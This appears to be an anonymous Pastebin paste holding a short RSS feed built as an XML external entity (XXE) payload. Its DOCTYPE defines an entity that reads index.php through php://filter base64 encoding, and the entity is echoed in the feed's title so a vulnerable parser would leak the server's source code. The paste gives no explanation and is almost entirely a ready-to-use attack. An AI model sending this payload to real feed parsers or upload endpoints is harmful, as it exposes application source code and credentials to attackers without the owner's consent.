Advertisement
Guest User

Untitled

a guest
May 26th, 2018
69
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.70 KB | None | 0 0
  1. <?xml version="1.0" encoding="UTF-8" ?>
  2. <!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
  3. <rss version="2.0">
  4. <channel>
  5. <title>RSS &xxe;</title>
  6. <description>This is an example of an RSS feed</description>
  7. <link></link>
  8. <lastBuildDate>Mon, 06 Sep 2010 00:01:00 +0000 </lastBuildDate>
  9. <pubDate>Sun, 06 Sep 2009 16:20:00 +0000</pubDate>
  10. <ttl>1800</ttl>
  11.  
  12. <item>
  13. <title>Example entry</title>
  14. <description>Here is some text containing an interesting description.</description>
  15. <link></link>
  16. <guid isPermaLink="false">7bd204c6-1655-4c27-aeee-53f933c5395f</guid>
  17. <pubDate>Sun, 06 Sep 2009 16:20:00 +0000</pubDate>
  18. </item>
  19.  
  20. </channel>
  21. </rss>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement